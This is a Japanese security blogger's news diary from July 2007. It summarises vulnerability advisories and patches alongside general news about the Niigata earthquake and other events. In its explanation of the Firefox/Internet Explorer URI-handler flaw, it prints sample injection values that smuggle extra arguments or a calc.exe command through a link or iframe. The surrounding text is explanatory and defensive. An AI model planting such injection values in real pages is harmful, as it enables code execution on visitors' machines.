[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@] C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"
あと、IE + Firefox2 の脆弱性 追記 (水無月ばけらのえび日記, 2007.07.16) に FirefoxHTML には罪はないという話が出ていました。
Firefox 2.0.0.5 登場。IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスクの話のセキュリティ修正などが含まれているはずだが、Fixed in Firefox 2.0.0.5 はまだ存在しない。……あ、できたみたい。合計 8 種類ですね。
IEとFirefoxをインストールしている人は要注意--「非常に重大」なセキュリティリスクへの対応として URL ハンドラを削除した場合でも、2.0.0.5 にアップデートすると再作成されました。
日本語な案内も出ました:
内訳:
| Critical: | |
| High: | |
| Moderate: | |
| Low: |
》 フジテック強度不足エレベーター、設置場所を発表…国交省 (読売, 7/17)、フジテック(株)製エレベーターの部材強度不足が見込まれる物件について (国土交通省, 7/17)
》 年金問題:政府「氏名不詳」記録の存在認める 件数答えず (毎日, 7/17)。そういうデータでも受け付けてしまえるシステムなんですね。 そういうのは、ふつうはエラーではじくんじゃないの?
長妻氏は「氏名の空欄を発見できないコンピューターシステムの設計はあり得ない。本来ならば国会の質疑で明らかにすべき話で、肝心な話はお茶を濁している」と批判している。
クエリーの場合にだけエラーではじいてしまうとか?
》 イギリスで「マリオパーティー8」がリコールの対象に (slashdot.jp, 7/17)。spastic ですか。言葉は難しいですね。
》 中越沖地震:柏崎刈羽原発に50件のトラブル 東電発表 (毎日, 7/17)、柏崎刈羽原発、全7基でトラブル50件…地震対策見直しへ (読売, 7/17)。どうやらヒヤリ・ハットが多発している模様。他の電力会社もこれを教訓にテコ入れしておかないと、次は本当に悲惨なことになりそうな予感。
元ねた: 新潟県中越沖地震の影響について(午後5時現在) (東電, 7/17)。「新潟県中越沖地震発生による柏崎刈羽原子力発電所のプラント状況」の話。
》 中越沖地震:原発停止 夏の電力供給に懸念 東京電力 (毎日, 7/17)、ネット公表装置が故障 柏崎刈羽原発の放射線量 (asahi.com, 7/17)
》 木造住宅に被害集中、低層に共振「キラーパルス」が影響か (読売, 7/16)
》 首都圏でも「ゆっくり揺れ」 中越沖地震 (asahi.com, 7/17)。長周期地震動を観測。
》 正義のGoogleボット君、ワンクリック詐欺をあばく (日経 BP Google 調査隊, 7/13)。要はただのリンクなので、たどれてしまうのですね。
》 第11回まっちゃ139勉強会アンケート集計結果 (まっちゃだいふくの日記, 7/17)
ちょっと寒かったですが…
温度設定なんて飾りです、偉い人にはそれがわからんのです。
プロジェクターがちょっと暗いですね
俺もそう思う (ォィ)。新しめのプロジェクターが入っている部屋を探しておくべきか…… > 俺。次期更新はもうちょっと先だしなあ。
》 Password Stealers targeting games are growing more than ever (McAfee blog, 7/16)。あいかわらず PWS-Banker の方が絶対数は多いみたいだけど。
》 「発電所もサイバー攻撃の対象になる」,米SANSのアラン・パーラー氏が警告 (日経 IT Pro, 7/17)
》 Symantec False-Positive on Filezilla, NASA World Wind (SANS ISC, 7/16)、 Symantecの対策ソフト、FileZillaやNASAツールをスパイウェアと誤認識 (ITmedia, 7/13)
》 米Google、プライバシー保護のためCookie有効期限を2年間に短縮 (Internet Watch, 7/17)。手元の Firefox では network.cookie.lifetime.days を 90 に設定しているのであまり関係ないけれど。
Googleは新しいCookieポリシーとして、2年間で有効期限が切れるCookieを今後数カ月以内に発行し始めることを決定した。
なんだ、まだやってないのかよ。
ぐぐっていたら、Posts tagged with "cookies" (opera.com: Implementer's notes) というページをみつけた。
》 公的年金が「ハゲタカ」に変身したら (日経 BP, 7/13)
》 [Full-disclosure] White Paper - Chrooting sshd というのが出ています。
》 中国:食品輸出禁止の企業リスト更新 日本向けは15社に (毎日, 7/16)
FreeBSD 5.3 以降の libarchive(3) に欠陥。 tar / pax ファイルの処理に欠陥があり、buffer overflow が発生して任意のコードを実行できる (CVE-2007-3641) 他、無限ループ (CVE-2007-3644) やクラッシュ (CVE-2007-3645) が発生する。 tar を利用した場合に欠陥が発現する。
5-STABLE / RELENG_5_5, 6-STABLE / RELENG_6_1 / RELENG_6_2 の最新ソースで修正されている。通常は libarchive と rescue をつくりなおせばよいのだが、amd64 プラットホームにおいて i386 互換ライブラリを利用している場合には make world が必要になる。
》 平成19年(2007年)新潟県中越沖地震発生 (AM 10:13)。M6.8、新潟県柏崎市西山町などで震度 6 強。
経済産業省原子力安全・保安院によると、1号機の地下5階に設置された地震計で東西方向に680ガルの揺れを観測。原子炉など重要機器の設計で想定する273ガルを大きく上回った。柏崎刈羽原発付近 想定超す大地震の恐れ (共産党, 2004.12.19) によると 柏崎刈羽原発は 450 ガルで設計されているようですが、それよりも大きい値が実際に記録されてしまいましたとさ。
》 NOD32アンチウイルスが正常に動作しない現象に関する重要なお知らせ (canon-sol.jp, 7/10)。今はだいじょうぶだそうで。
》 au利用料、5万を500万と誤請求…システム不具合で (読売, 7/15)。豪快ですね。
》 核施設の稼働停止・IAEAの監視容認…北朝鮮が表明 (読売, 7/15)
》 中国産ウナギ:合成抗菌剤を検出 群馬・前橋 (毎日, 7/14)。徳島魚市場ですか。
》 ビンラディン容疑者、2年9カ月ぶりビデオで登場 (asahi.com, 7/15)
》 東南アジア海賊情報 (6/7〜7/11 入手分) (海上保安庁, 7/12)
》 参院選:自民候補32%、核武装検討を容認 毎日新聞調査 (毎日, 7/16)。超ビンボーな金ちゃんちだって持ってるのに、どうしてボクんちは持ってないのォーーーって感じ?
》 海上保安庁のサイト www3.kaiho.mlit.go.jp がなんだかすごいことになっています。itochan さん、Luca さん情報ありがとうございます。
http://www3.kaiho.mlit.go.jp にアクセスするとそこにはなぜかオリエンタルモーター株式会社が……という話。
% host www3.kaiho.mlit.go.jp
www3.kaiho.mlit.go.jp is an alias for jcgbkwb1.kaiho.mlit.go.jp.
jcgbkwb1.kaiho.mlit.go.jp has address 202.234.165.34
% host 202.234.165.34
34.165.234.202.in-addr.arpa domain name pointer omweb.orientalmotor.co.jp.
% whois 202.234.165.34
[ JPNIC database provides information regarding IP address and ASN. Its use ]
[ is restricted to network administration purposes. For further information, ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output, ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'. ]
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.234.165.32/28
b. [ネットワーク名] OM-NET
f. [組織名] オリエンタルモーター株式会社
g. [Organization] Oriental Motor Co., Ltd.
m. [管理者連絡窓口] HY6269JP
n. [技術連絡担当者] DM678JP
p. [ネームサーバ]
[割当年月日] 2007/01/31
[返却年月日]
[最終更新] 2007/01/31 11:53:02(JST)
上位情報
----------
ソフトバンク・アイディーシー株式会社 (SOFTBANK IDC Corp.)
[割り振り] 202.234.128.0/18
PSINet (PSINet)
SUBA-021-231 [SUBA] 202.234.165.0/24
下位情報
----------
該当するデータがありません。
ふぅむ……。 jcgbkwb1.kaiho.mlit.go.jp というのは Japan Coast Guard Backup Web 1 ということなんですかね。 www3.kaiho.mlit.go.jp 自体は、 室蘭海上保安部とか鳥羽海上保安部とかが入っているサーバみたいなのですが……。
netcraft のデータを見る限りでは、昔から 202.234.165.34 だったようで。 202.234.165.32/28 は、昔は海上保安庁に割り当てられていたようだけど、2007.01.31 にはオリエンタルモーターに割り当てられているようだしなあ。IP アドレスのリナンバー忘れとかなのだろうか。 うーむ……
》 冷凍うなぎ 中国産に禁止抗菌剤 かば焼き群馬で検出 関東へ10万匹分出荷 (東京新聞, 7/14)
》 生活保護、不法に廃止 収入など調べず 北九州の孤独死 (asahi.com, 7/14)
》 総務省 パブコメ 「電気通信事業における個人情報保護に関するガイドライン第26条解説改訂案」 (まるちゃんの情報セキュリティ気まぐれ日記, 7/14)
》 VALUESTAR N、VALUESTAR G タイプNをお持ちのお客様へのお願い (121ware.com, 7/12)。Hybrid HDD ねた。BIOS アップデートで修正されるそうで。
》 2003年3月以降出荷のLaVie M、LaVie G タイプM、VersaPro モバイルノートの不具合に関するお詫び (121ware.com, 7/13)
2003年(平成15年)3月から2005(平成17年)年4月にNECおよびNECパーソナルプロダクツ(以下併せて弊社)が出荷した一部のモバイルノートパソコン「LaVie M」および「LaVie G タイプM(Web直販専用モデル)」「VersaPro モバイルノート(ベイ内蔵型)」において、稀にパソコンの電源が入らなくなる場合があり、その一部において発熱により筐体の変形に至る(底面に直径5mm程度の穴が開く)場合があります。
無償修理しているそうです。
》 コンピュータ省電力化の新規格「Energy Star 4.0」が7月20日に発効 (computerworld, 7/13)
JDK / JRE 5 Update 6 以降や JDK / JRE 6 では、古いバージョンの JRE を指示された場合の扱いが改善されており、最新版をインストールさえすればよいようだ。 続・厚生労働省の脆弱性放置は何が問題とされているのか (高木浩光@自宅の日記, 7/10) の「Java Updateしても古いJREが消えない問題」を参照。
セキュリティベースラインにどのようなバージョンが指定されているのかは、Java SE のリリースノートに明記されている。たとえば Java SE 6 Update Release Notes (Sun) の「1.6.0_02 での変更点」を見ると、 こんな表がある。
| JRE Family Version | Security Baseline |
|---|---|
| 5.0 | 1.5.0_12 |
| 1.4.2 | 1.4.2_14 |
元ねたと CVE が公開されている。
CESA-2006-004 - rev 2: JDK image parsing library vulnerabilities (ICC parsing, BMP parsing) (Chris Evans)。
画像ファイルの ICC プロファイルの処理に integer overflow する欠陥があり、任意のコードを実行できる。 JPEG パーサと BMP パーサは ICC プロファイルをサポートしているため、この欠陥の影響を受ける。サンプル JPEG ファイルが公開されている。 CVE-2007-2788
BMP パーサに local file を開くことができる欠陥があり、少なくとも DoS 攻撃を実施できる。 サンプル BMP ファイルが公開されている。 CVE-2007-2789
上記した 7月のセキュリティ リリース 後のまとめ (日本のセキュリティチームの Blog, 2007.07.13) において 940297 - Windows XP SP2 に .Net Framework を再インストールする方法 が紹介されていたので追記。
》 Delegateのプロキシサーバを経由してDAT更新が出来ない (マカフィー)。へぇ。
》 Phishing in two seconds (trendmicro blog, 7/13)。いまどきのフィッシングサイトは 2 秒で完成だそうです。
》 安倍首相:靖国神社の「みたままつり」にちょうちん奉納 (毎日, 7/13)
》 裁判の迅速化進む、「刑事」7割以上が3か月以内 (読売, 7/13)
冷凍食品大手「加ト吉」がウナギを輸入していた中国の食品企業が、中国政府から輸出停止の処分を受けたことがわかり、(中略) このウナギを使った弁当を販売するサークルKサンクスは13日、安全性が確認されるまで販売と予約受け付けを一時中断すると発表した。また加ト吉か……
》 ハンガリー:警察に不正渦巻く (JANJAN, 7/11)
》 トルコ:対クルド戦へ秒読みか (JANJAN, 7/12)
》 藤田東吾さんが天木直人さんの応援に駆けつける (JANJAN, 7/12)
》 知ってる?現代っ子「雨ニモアテズ」 (産経 / Yahoo, 7/12)。ざぶとん 3 枚!
》 IceSword 1.22 English Version (てっしーの丸出し, 7/11) が出てるようで。
》 アイ・オー,アクセス履歴も管理できる暗号化USBメモリー (日経 IT Pro, 7/11)
新版のEasyDisk Secure2では,従来製品にUSBメモリー内へのアクセス・ログ記録機能を追加した。(中略) また,新版ではWindowsのAdministrator以外のユーザー権限でも利用可能になった。
》 摘発した違法サイトに警察庁が警告文を載せる(誘導する) (うさぎ文学日記, 7/10)
刑が確定/判決が出たものだけが対象のようです。また、その違法サイトのURLの管理者(ISPなど)に対して、警告サイトへの誘導ページを載せてもらうことを警察が依頼するんだそうです。
》 空自イラク派遣の1年間延長を決定 (読売, 7/10)
》 FBI、個人の行動追跡にデータ・マイニングを利用 : テロの兆候発見や個人情報盗難の動向分析などが目的 (computerworld, 7/13)
・本ガイドラインは空中・宇宙、海底、人体内等を稼働領域とするロボットを対象としない。また、戦場等で使用される軍用のロボットも対象としない。
・手術用ロボットは、一般の次世代ロボットとは使用形態が異なり、個別に安全性を確保すべきロボットであることから、本ガイドラインの対象としない。
米国では内部統制監査について、つまり、現場の感覚と真逆だと……。実に日本らしくて涙が出ますね。
(1)内部統制報告書の適正性と
(2)内部統制の有効性
についての意見を述べるという方法から、企業の負担を軽減するために
(2)内部統制の有効性
についての意見を述べるだけにするという方法に変更しましたね。。。
一方、日本の場合は、経営者負担を少なくすると言う観点から
(1)内部統制報告書の適正性
について意見を述べることになったわけですが、 現場感覚としては、米国の方法のほうが経営者の負担が減るんじゃないのという意見が圧倒的ですね。というか、私が聞いた数名の人は全部そうでした。。。
》 あなたのブログやHPを規制する法制度がつくられようとしている〜パブコメしよう! その1、 その2、 その3、 その4、 その5 (情報流通促進計画 by ヤメ記者弁護士(ヤメ蚊))。 「通信・放送の総合的な法体系に関する研究会」の中間取りまとめに対するパブコメ (締切: 7/20) の話。
》 Government Servers Hosting Phishing Sites (Symantec blog, 7/12)
Thailand (.go.th), Indonesia (.go.id), Hungary (.gov.hu), Bangladesh (.gov.bd), Argentina (.gov.ar), Sri Lanka (.gov.lk), Ukraine (.gov.ua), China (.gov.cn), Brazil (.gov.br), Bosnia and Herzegovina (.gov.ba), Columbia (.gov.co), and Malaysia (.gov.my)
》 情報漏洩に備える——ダメージを抑えるための心得7カ条 (computerworld, 7/12)。Winny とか系だと、最初の「問題の封じ込め」が困難なんですよねえ。
》 New Tool: AdExplorer v1.0 and Various Updates (Sysinternals Site Discussion, 7/9)。AdExplorer は Active Directory viewer / editor 。
》 橋下弁護士の口車に乗って光市事件弁護団の懲戒請求をしたあなたへ取り下げるべきだとアドバイス〜 その1、 その2、 その3、 その4、 その5 (情報流通促進計画 by ヤメ記者弁護士(ヤメ蚊))。 拷問・冤罪大国ニッポンの現実を理解していない人大杉、ということか。
最近、国連の拷問禁止委員会が日本の現状にレッドカードを突きつけました(ここ←参照)。代用監獄、長時間の取調、取調の密室化などの状況にある委員は、「人権を守るという価値観が日本にはないのか」とまで述べたそうです。
日本は国連の拷問禁止委員会 (!) にレッドカードを突きつけられるような国だ、ということです。国連拷問禁止委員会の最終見解発表にあたっての会長声明 (日弁連, 5/22)
》 NHK「ネットの“祭り”が暴走する」の捏造・偏向 (実況ニュースサロン, 7/8)
》 「知っていますか?脆弱性(ぜいじゃくせい)」の公開について −アニメで見るウェブサイトの脅威と仕組み− (IPA ISEC, 7/12)
》 訴訟のトータルなメリット・デメリット (SLAPP WATCH, 7/13)
》 新宿の朝、安倍政権への国民審判始まる (保坂展人のどこどこ日記, 7/12)。いよいよ選挙ですね。
》 JVN に掲載されたクロスサイト・スクリプティング問題 (日経 IT Pro, 7/10)
》 来年4月までにイラク撤退、米下院が決議…大統領へ圧力 (読売, 7/13)
》 米Microsoft、マルウェア情報ポータルの正式版を開設 (Internet Watch, 7/11)。 Microsoft Malware Protection Center。VirusTotal のようなものでも、 WebImmune のようなものでもないみたい。
》 Microsoft、過去に販売したすべてのXbox360に欠陥があることを認める (gigazine, 7/13)。すべてってあなた……。
》 「どこまでが補償金の対象?」私的録音録画小委員会で議論 (Internet Watch, 7/11)。「私的録音録画小委員会」2007年第7回会合 (7/11) の話。
》 海の向こうの“セキュリティ” 第10回:韓国の自動証明書販売機、紙の偽造指紋でも認証 ほか (Internet Watch, 7/11)
》 「魔法のiらんど」に不正アクセス 1週間サービス停止 (ITmedia, 7/12)
》 ソフトの優先度を自動変更して高速化するフリーソフト「オートギア」 (gigazine, 7/13)。へぇ。
……「オートギア」のおかげで、「バックギア!」「バック片輪走行!!」というセリフが脳内再生されて仕方がない今日このごろ (参照: マシンハヤブサ)。
》 赤痢菌:順天堂大の学生5人から検出 細菌学実習で感染? (毎日, 7/12)
強度の低い鋼材が使用されているものは、エレベーター12,727台、エスカレーター634台で、フジテック(株)が確認申請図書等をもとに、建築基準法に基づき強度計算を再度行ったところ、部材の強度不足が見込まれるものがエレベーターで560台あるとの報告がありました。(エスカレーターについては強度不足のものは無いとのこと。)
鋼材は、大手鉄鋼メーカー、JFEスチール系列のJFE商事建材販売(大阪市)が強度の高い鋼材と偽って納入。偽装された鋼材の取引は、フジテック社員との合意の上だった疑いがあり、国交省は同社に月末までの報告を求めた。
「注文とは異なる弱い鋼材を納入された」。フジテック側は12日の記者会見で、納入元の「JFE商事建材販売」(大阪市)の責任を強調したが、同社は「フジテックと合意の上だった」と反論。両者の見解が食い違っているため、フジテックは、元検事らで作る第三者委員会を近く設置し、7月末までに調査結果を公表するとしている。
JR西日本では、管内1209駅にある全444基のエレベーターのうち、03年以降に設置された73駅の142基がフジテック製で、すべて強度不足の恐れがあるとされた560基に含まれていた。
同社では、フジテック社から「通常の運転にはまったく支障がない」と説明を受け、「使用を休止すればかえって混乱を招き、利用者にかける不便が大きい」と判断。当面の対策として、142基の速度を分速45メートルから30メートルに設定し直した。
》 Sony BMGがルートキット開発会社を訴える (slashdot.jp, 7/12)。あれ? First4 Internet の XCP Content Protection Technology (もともとのネタ) じゃなくて SunnComm の Media Max (後から「これも問題」とされたもの) の方なんだ。 その意味ではタレコミ文はひどい内容だし編集者もだめすぎ。
》 偽会社を設立して放射性物質購入のライセンスを獲得 (slashdot.jp, 7/13)。GAO のタイガーチーム、いい仕事してます。
》 第12回まっちゃ139勉強会のポスターを作っていただきましたm(__)m (まっちゃだいふくの日記, 7/13)
》 Backdoor Uses DNS as ‘Side Door’ (trendmicro blog, 7/12)。DNS を使って命令を要求・伝達するマルウェア BKDR_FONAMEBOT.A の話。
》 「このファイル怪しい」と感じたら,まずスキャン−−VirusTotal (日経 IT Pro, 7/13)
「お客様からの問い合わせです。ご対応いただけますでしょうか」。こんな文面で,Wordファイルが添付されたメールが届いたら,あなたはどうしますか
何も考えずに VirusTotal したが実は本当にお客様からの問い合わせだったら、情報漏曳一丁上がりなんですけど。業務の場合は、周辺情報を確認した上でないと使えないですよね。そういう意味では、イントラネット用の VirusTotal 的なものがあればいいのでしょうけど。
AVG AntiVirus に欠陥。カーネルモードサービスドライバ avg7core.sys に欠陥があり、local user が任意のアドレスに任意のデータを書き込める。 CVE-2007-3777
AVG 7.5 build 476 (avg7core.sys 7.5.0.476) で修正されている。 ダウンロード: AVG Anti-Virus Professional Edition 7.5 (full version)、 AVG Anti-Virus Free Edition 7.5
QuarkXPress 7.2 for Window に欠陥。Word 6-2000 Filter.xnt に stack overflow する欠陥があり、攻略 Word ファイルによって任意のコードを実行できる。 PoC コードが公開されている。 CVE-2007-3678
patch はまだない。
kernel スケジューラ方面の話みたい。USENIXSecrity '07 で発表されたのだそうで。 よくわかんないけど、local user が DoS 攻撃できるみたい。 CVE-2007-3724 (XP) CVE-2007-3723 (Solaris) CVE-2007-3722 (FreeBSD 4BSD) CVE-2007-3721 (FreeBSD ULE) CVE-2007-3720 (Linux 2.4) CVE-2007-3719 (Linux 2.6.16)
102997: Java Secure Socket Extension Does Not Correctly Process SSL/TLS Handshake Requests Resulting in a Denial of Service (DoS) Condition (Sun)。SDK / JRE 1.4.2_15, JDK / JRE 5.0 Update 12, JDK / JRE 6 Update 2 で直ってるそうだ。 CVE-2007-3698
102993: Java Runtime Environment Does Not Securely Process XSLT Stylesheets Contained in XML (Sun)。Java SE 6 update 2 で直ってるそうだ。 CVE-2007-3716
Linux kernel 話
Re: Advisory - Clam AntiVirus RAR File Handling Denial Of Service Vulnerability.。unrar 3.70 beta 3 にも ClamAV 0.90.3 以前と同様の欠陥がある、という指摘。 CVE-2007-3726
Redirection Vulnerability in wp-pass.php, WordPress 2.2.1。WordPress 2.2.2 で修正される予定。 CVE-2007-3639
MDaemon 9.61 で直った話: CVE-2007-3622
Symantec Norton Ghost 12.0 話
Fedora Core 5,6 (exec-shield) based Apache Tomcat Connector (mod_jk) remote overflow exploit (milw0rm, 2007.07.08)。 Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability / CVE-2007-0774 の exploit だそうです。
Bug 387333 ? [FIX]unauthorized access to wyciwyg:// documents possible (Bugzilla@Mozilla - Bug 387333)。 Firefox 2.0.0.5 で修正されるようです。 CVE-2007-3656
Cisco Security Advisory: Cisco Unified Communications Manager Overflow Vulnerabilities (Cisco)
Red Hat Enterprise Linux init.d XFS Script chown Race Condition Vulnerability (iDefense, 2007.07.12)。CVE-2007-3103
SquirrelMail G/PGP Plugin 話:
G/PGP Plugin 2.1 で修正されている。
TilePlex脆弱性発見と対応につきまして (ウノウラボ)、TilePlex脆弱性問題の追跡調査と再開につきまして (ウノウラボ)。 外部からユーザ情報を取得できてしまう欠陥があった模様。
JVN#33593387: KDDI 製ダウンロード CGI サンプルプログラムにおけるディレクトリトラバーサルの脆弱性、 サンプルプログラムのセキュリティに関する重要なお知らせ (KDDI EZfactory)。 CVE-2007-3692
SAP、「重大レベル」の脆弱性を修正 (CNET, 2007.07.09)
日本語版:
MS07-036 英語版が更新され、対象として Microsoft Office 2004 for Mac が追加されています (修正プログラムも掲載されています)。 MS07-036 日本語版もおいおい修正されるでしょう。
……修正されました。Office 2004 を利用している Mac ユーザは、Microsoft Office 2004 for Mac 11.3.6 更新プログラムを入手して適用してください。
MS07-039 - 緊急: Windows Active Directory の脆弱性により、リモートでコードが実行される (926122) が更新されている。なぜ Windows 2000 Professional も更新対象になっているのか話が追加されている:
影響を受けるソフトウェアはインストールしていませんが、なぜセキュリティ更新プログラムが提供されるのですか?
このセキュリティ更新プログラムにより解決される脆弱性はドメイン コントローラの役割で機能している Windows 2000 Server および Windows Server 2003 コンピュータのみに影響を及ぼしますが、影響を受けるコードは Windows 2000 および Windows 2003 のすべてのサポートされているエディションに存在します。この更新プログラムは、影響を受けるコードを含むすべてのコンピュータに提供されます。
MS07-041 - 重要: Microsoft インターネット インフォメーション サービスの脆弱性により、リモートでコードが実行される (939373) が改訂されました。
ホストされているアプリケーションで統計を保持するために IIS 5.1 が使用するオブジェクトに脆弱性が存在するという説明を追加しました。
MS07-041 - 重要: Microsoft インターネット インフォメーション サービスの脆弱性により、リモートでコードが実行される (939373) が改訂されました。
ホストされているアプリケーションで統計を保持するために IIS 5.1 が使用するオブジェクトに脆弱性が存在するという説明を追加しました。
よくよく見るとこれ、CVE-2005-4360 なんですね。2005 年って……
関連:
関連: IE関与の脆弱性、Firefox側が対処を表明 (ITmedia, 2007.07.13)。 CVE-2007-3670
これだけなぜかまだ日本語版が出ていませんので、以下の記述において、日本で発売されている製品・バージョンとは異なる可能性があります。
シマンテックの、ゲートウェイ系の製品や Norton AntiVirus / Norton Internet Security / Norton System Works 2004 / 2005 / 2006, Norton Personal Firewall 2006, Norton AntiVirus for Macintosh 9.x / 10.x, Norton Internet Security / Norton SystemWorks for Macintosh 3.x, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x などに欠陥。 攻略 RAR ファイルによる DoS、攻略 CAB ファイルによって任意のコードの実行が可能。日吉さん情報ありがとうございます。 CVE-2007-3699 CVE-2007-0447
修正版については SYM07-019 の記述を参照。
Norton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005, Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x、Symantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x に欠陥。SYMTDI.SYS に欠陥があり、local user が SYSTEM 権限で任意のコードを実行できる。 CVE-2007-3673
Norton AntiVirus / Norton Internet Security / Norton Personal Firewall / Norton System Works 2005 / 2006, Norton AntiSpam 2005 については LiveUpdate を実行することで修正される。SAV CE と SCS については、 SAV CE 9 MR6 MP1 以降 / SAV 10.1 MR6 以降、SCS 2.0 MR6 MP1 以降 / SCS 3.1 MR6 以降にアップグレードして対応する。
関連: Symantec AntiVirus symtdi.sys Local Privilege Escalation Vulnerability (iDefense)
Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0.x / 10.1.x、Symantec Client Security (SCS) 2.0.x / 3.0.x / 3.1.x に欠陥。 Real-Time スキャナ (RTVScan) に欠陥があり、local user が SYSTEM 権限を取得できる。 CVE-2006-3455
SAV CE 9.0.6 MR6 MP1 (ビルド 1100) 以降 / 10.1.4 MR4 MP1 (ビルド 4010) 以降、 CS 2.0.6 MR6 MP1 (ビルド 1100) 以降 / SCS 3.1.4 MR4 MP1 (ビルド 4010) 以降にアップグレードして対応する。
Symantec AntiVirus Corporate Edition (SAV CE) 9.x / 10.0、Symantec Client Security (SCS) 2.0.x / 3.0.x に欠陥。 Internet E-mail Auto-Protect 機能に欠陥があり、メールの From:, To:, Subject: が 951 バイト以上だと buffer overflow し DoS が発生。 CVE-2006-3456
SAV CE 9 MR6 (SAV CE 9.0.6.1000) 以降 / 10.1 以降、SCS 2.0.6 MR6 (ビルド 1000-31) 以降 / SCS 3.1 以降にアップグレードして対応する。
Backup Exec for Windows Servers 10.0 / 10d / 11d に欠陥。 RPC インタフェースに欠陥があり、remote から DoS 攻撃を受ける。 CVE-2007-3509
HotFix があるので適用すればよい。
関連: Symantec Backup Exec RPC Remote Heap Overflow Vulnerability (iDefense)。6106/tcp だそうです。
》 有料放送の録画違法化に反対している人は誰? (栗原潔のテクノロジー時評Ver2, 7/11)
》 情報セキュリティの法律 (商事法務) という書籍があるのだそうです。岡村久道先生です。
》 ビジネスモデルとしての名毀毀損訴訟 (SLAPP WATCH, 7/12)。新・名誉毀損 (商事法務) という書籍があるのだそうです。
》 新生銀行を騙るフィッシングメールキター!! (かきくけこうもりのよろず投資日記・個別株式の自動売買) と同様のものが手元にも来ていることが判明したので、特定の URL へのアクセス制限を設定した。 関連: 新生銀行をかたるフィッシング詐欺が出現、編集部にも偽メールが (日経 IT Pro, 7/12)
》 「OpenOffice 2.2.1」日本語版がリリース (Internet Watch, 7/12)
》 新聞紙から手軽に強力な武器を作る方法 (gigazine, 7/11)
》 海面すれすれを飛ぶ航空機、中国の大学が開発 (ITmedia, 7/11)。WIG って昔からあるんですけど。ソヴィエト連邦は WIG 好きでしたよねえ。
》 HijackThis version 2.0.2 available now (Trendmicro blog, 7/10)。Windows Vista / IE 7 サポートが改善されるなどされているそうです。
》 チームチドリ勉強会のお知らせ: CTFの予選問題を実際に解いて皆で楽しく技術向上をはかる。 2007.07.28、東京都新宿区、500円程度 (参加者でワリカン)
》 How to restrict SWF content from HTML (Adobe blog: State of Security, 7/10)
McAfee Common Management Agent (CMA) に 4 つの欠陥。
日本語版:
Free ePO Vulnerability Scanner (eEye Research, 2007.07.17)
ClamAV 0.91 登場。[Full-disclosure] Advisory - Clam AntiVirus RAR File Handling Denial Of Service Vulnerability が修正されている。 CVE-2007-3725
QuickTime 7.2 登場。8 つの欠陥が修正されています。 攻略 QuickTime movie, H.264 movie, .m4v ファイル, SMIL ファイルによって任意のコードを実行できる他、QuickTime for Java に関して 3 つの欠陥があり、 攻略 Java アプレットを使って任意のコードを実行したり、クライアントの画面をキャプチャしたりできる模様。 CVE-2007-2295 CVE-2007-2392 CVE-2007-2296 CVE-2007-2394 CVE-2007-2397 CVE-2007-2393 CVE-2007-2396 CVE-2007-2402
ダウンロード:
……Windows 2000 にインストールできなくなってますね…… orz
関連: Apple QuickTime SMIL File Processing Integer Overflow Vulnerability (iDefense)
[Full-disclosure] Apple QuickTime integer overflow vulnerability when parsing SMIL file。 CVE-2007-2394 の件。
Firefox 2.x を Windows にインストールしている場合に、IE 上に欠陥が発生する。 Firefox 2.x をインストールすると、次の FirefoxURL:// URI ハンドラが設定される。
[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@] C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -url "%1" -requestPending
このため、たとえば %1 に FirefoxURL://foo" -chrome "javascript:hogehoge... が入るようなアンカータグを設置しておくと、IE でそのリンクを踏んだ場合に firefox.exe -url "FirefoxURL://foo" -chrome "javascript:hogehoge..." -requestPending が起動されてしまう。Firefox 自身が FirefoxURL:// を扱う場合にはこうならないように内部処理されているようなのだが、IE の場合にはキケンな状況になるようだ。 詳細については Internet Explorer 0day Exploit (Larholm.com, 2007.07.10) を参照。危険なアンカータグの実例つき。 FirefoxURL:// の他に FirefoxHTML:// や Firefox.URL:// も危険な模様。
この状況を回避するには、上記の URI ハンドラ (レジストリ設定) を削除すればよい。 Blocking the Firefox -> IE 0-day (Jesper's Blog, 2007.07.10) では次のコマンドを解説している。
reg delete HKCR\FirefoxHTML /f reg delete HKCR\FirefoxURL /f reg delete HKCR\Firefox.URL /f
Windows 2000 用の reg コマンドは Windows 2000 Support Tools に含まれている。
関連: IE関与の脆弱性、Firefox側が対処を表明 (ITmedia, 2007.07.13)。 CVE-2007-3670
Firefox 2.0.0.5 が登場しました。 ハンドラですが、次のようになっています。
[HKEY_CLASSES_ROOT\FirefoxURL\shell\open\command\@] C:\\PROGRA~1\\MOZILL~2\\FIREFOX.EXE -requestPending -osint -url "%1"
あと、IE + Firefox2 の脆弱性 追記 (水無月ばけらのえび日記, 2007.07.16) に FirefoxHTML には罪はないという話が出ていました。
この欠陥ですが、Firefox だけでなく Thunderbird にも影響するそうです。
Thunderbird 2.0.0.5 で修正されるそうですが、Thunderbird 2.0.0.5 はまだ公開されていません。……とか言ってる間に出てました。
iDefense からも出てました: [Full-disclosure] iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability。 Microsoft 的には、Registering an Application to a URL Protocol (MSDN) でも広報していた仕様だったようで。MSDN に例示されていた note: URI ハンドラが実装された場合、
<iframe src='note:"|calc.exe '>
というタグで calc.exe が自動で起動されたようです。MSDN ページ、現在は改訂されています。
iDefense によると、少なくとも次の URI ハンドラに問題がある (あった) そうです。
HKEY_CLASSES_ROOT\FirefoxURL\shell HKEY_CLASSES_ROOT\Thunderbird.Url.mailto\shell HKEY_CLASSES_ROOT\Thunderbird.Url.news\shell HKEY_CLASSES_ROOT\mailto\shell HKEY_CLASSES_ROOT\news\shell
Adobe Photoshop CS2 / CS3 に欠陥。攻略 BMP, DIB, RLE, PNG ファイルを使って任意のコードを実行できる。 CVE-2007-2244 CVE-2007-2365
